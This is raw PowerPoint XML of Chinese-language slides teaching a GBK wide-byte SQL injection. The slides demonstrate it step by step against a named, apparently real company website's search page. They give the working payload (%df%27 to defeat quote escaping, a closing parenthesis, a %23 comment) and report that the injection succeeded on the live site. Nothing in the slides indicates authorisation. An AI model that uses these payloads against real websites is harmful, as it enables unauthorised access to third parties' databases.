                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1521570017"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483826" r:id="rId1"/>
    <p:sldLayoutId id="2147483835" r:id="rId2"/>
    <p:sldLayoutId id="2147483833" r:id="rId3"/>
    <p:sldLayoutId id="2147483834" r:id="rId4"/>
    <p:sldLayoutId id="2147483675" r:id="rId5"/>
    <p:sldLayoutId id="2147483832"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90" r:id="rId16"/>
    <p:sldLayoutId id="2147483692" r:id="rId17"/>
    <p:sldLayoutId id="2147483685" r:id="rId18"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2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iwulianhe.com/search.php?keywords=%df%27&amp;part=informa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424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SG" dirty="0" smtClean="0"/>
              <a:t>http://www.yiwulianhe.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2216287"/>
            <a:ext cx="8229600" cy="3290614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3992235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1539"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>合单引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>号时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开发用过滤器规则在你的单引号前面加一个</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 这样就无法闭合单引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>号</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zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法：可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以在</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前输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>构成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>df</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经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>解释器解码后就成为汉字，</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zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </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百度可查宽字节注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> %27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码时如下，将多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>去掉</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zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2033688"/>
            <a:ext cx="8229600" cy="365581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444500"/>
            <a:ext cx="8229600" cy="2184399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后，页面（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>报错）恭喜你，成功的将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>出错信息暴露。</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en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.yiwulianhe.com/search.php?keywords=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>df%27&amp;part=information</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en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句原型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from table where id like(‘%XXX%’) ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>前一个单引号已关闭，如何关闭第一个括号？答：再加一个）即可 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>df</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单引号和括号都已经关闭了，如何把后面的注释掉呢？用</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后一定要用空格）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3170916"/>
            <a:ext cx="8229600" cy="138135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srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2476500"/>
            <a:ext cx="8496300" cy="2053309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190625" y="1181100"/>
            <a:ext cx="6561796" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’)--  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>编码发现空格经过处理被去掉了，遗憾～～</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>怎么办？？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>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1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="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也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是注释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>符</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但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码，把＃去掉了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3089046"/>
            <a:ext cx="8229600" cy="154509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1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>试把＃换成％</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>23</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zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入成功了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1877382"/>
            <a:ext cx="8229600" cy="396842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98661"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这时就可以试着在注释符前插入注入语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>info()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>来构造伪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
